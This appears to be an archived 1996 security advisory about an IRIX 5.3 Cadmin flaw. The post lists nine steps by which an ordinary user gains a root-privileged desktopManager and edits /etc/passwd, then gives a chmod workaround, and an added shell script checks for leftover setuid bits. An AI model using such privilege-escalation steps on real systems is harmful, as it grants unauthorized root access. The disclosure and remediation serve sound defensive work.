IRIX 5.3 chost apparently fails to drop privileges sufficiently when an invalid root password is entered
Grant Kaufmann (firstname.lastname@example.org)
IRIX 5.3 with vulnerable chost.
6 August 1996
The SGI patch may not always plug the hole!
From: Bill Nickless (nickless@MCS.ANL.GOV)
Date: Wed, 14 Aug 1996 13:08:14 -0500
I did a little experimentation and found that there's another precondition
for this cadmin exploit to work. You cannot have a desktopManager process
already running as you when you start the process.
First, verification that we're running the right patch levels and such:
flying% uname -a
IRIX flying 5.3 11091811 IP19 mips
flying% versions -b | cut -c35-199 | grep Patch
Patch SG0000813: Provide icrash on 5.3
Patch SG0000852: SCSI roll up for 5.3 without XFS
Patch SG0000870: 5.3 EFS rollup patch for all 5.3 non-XFS releases
Patch SG0000900: rev 3.17 io4prom patch
Patch SG0000918: RE OpenGL Extensions, Aux Buffers, and Bug Fix Rollup
Patch SG0001020: Security fix for login and telnetd
Patch SG0001092: networking rollup, fixes for hangs on socket data, new mrouted
Patch SG0001096: Objectsystem & Removable Media Software roll up
Patch SG0001102: NFS roll-up
Patch SG0001116: 5.3/5.3XFS combined kernel roll up patch
Patch SG0001128: CERT VU 15781
Patch SG0001146: sendmail security bug in queue management
Patch SG0001157: Change hinv to recognize all IMPACT gfx
Patch SG0001324: Fix for security loophole in the desktop permissions panel
flying% cd /usr/Cadmin/bin
flying% ls -l cimport
-rwsr-xr-x 1 root sys 161896 Apr 9 00:29 cimport
flying% sum cimport
62654 317 cimport
flying% df | grep nfs
cavesound:/usr/tmp nfs 3052196 2725027 327169 89% /mnt
Now for the exploit, run as a regular non-root user:
1. From any shell prompt: killall -9 desktopManager
2. From /usr/Cadmin/bin, run ./cadmin.
3. Click on "New" as if you were going to create a new NFS mount point.
4. A dialog window will appear asking for the root password. Enter something
other than the root password into the password field. Click on "OK".
5. An error dialog window will appear warning that you have entered an
incorrect password. Click on "OK".
6. You are then returned to the root password-requesting dialog window.
Click on "Cancel."
7. Double-click on the folder icon of the previously-mounted NFS filesystem.
This will start a desktopManager process, ostensibly running as you the
user, but actually running with some root privileges.
8. In the top of the desktopManager window, replace the pathname of the
previously-mounted NFS filesystem with /etc
9. Scroll down to passwd, double-click, and edit to your heart's content
in the jot window that gets created.
Once again, the workaround shell script fragment that eliminates this exposure:
# Exploit from http://www.eecs.nwu.edu/~jmeyers/bugtraq/1099.html
# will work even with the patches installed as of 13 August 1996.
# Accordingly, turning off the suid bits on the Cadmin programs.
for p in cexport cformat chaltsys chost chostInfo cimport clogin \
cmidi configClogin cpeople cports cpuView csetup cswap \
diskView tapeView videoView
do
/bin/chmod u-s /usr/Cadmin/bin/$p
done
Bill Nickless email@example.com +1 630 252 7390
PGP 2.6.2 Key fingerprint = 0E 0F 16 80 C5 B1 69 52 E1 44 1A A5 0E 1B 74 F7
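As an added example that is not part of Bill Nickless's post, here is a POSIX sh check that reports which of the Cadmin programs named in the workaround still carry the setuid bit, so that the chmod can be verified after it is applied. The program list is the post's own; the directory is a parameter (assumed, so the check can be pointed at a staging copy) and the function names are hypothetical.

```shell
#!/bin/sh
# Added example, not from the original post: verify the Cadmin setuid
# workaround. Program names are taken from the post's chmod loop.

CADMIN_PROGS="cexport cformat chaltsys chost chostInfo cimport clogin
cmidi configClogin cpeople cports cpuView csetup cswap
diskView tapeView videoView"

# Print each listed program under DIR that still has its setuid bit set,
# one path per line. Returns 0 when none is setuid, 1 otherwise.
cadmin_suid_report() {
    dir=$1
    found=0
    for p in $CADMIN_PROGS; do
        f="$dir/$p"
        # POSIX test: -u is true when the set-user-ID flag is set.
        # Programs not installed on this host are simply skipped.
        if [ -f "$f" ] && [ -u "$f" ]; then
            echo "$f"
            found=1
        fi
    done
    return $found
}

# Apply the post's workaround (chmod u-s) to every listed program that
# exists under DIR, then re-run the report; returns 0 only if nothing
# is left setuid.
cadmin_strip_suid() {
    dir=$1
    for p in $CADMIN_PROGS; do
        [ -f "$dir/$p" ] && chmod u-s "$dir/$p"
    done
    cadmin_suid_report "$dir" >/dev/null
}

# Usage: sh cadmin_suid_check.sh /usr/Cadmin/bin
if [ $# -gt 0 ]; then
    cadmin_suid_report "$1"
fi
```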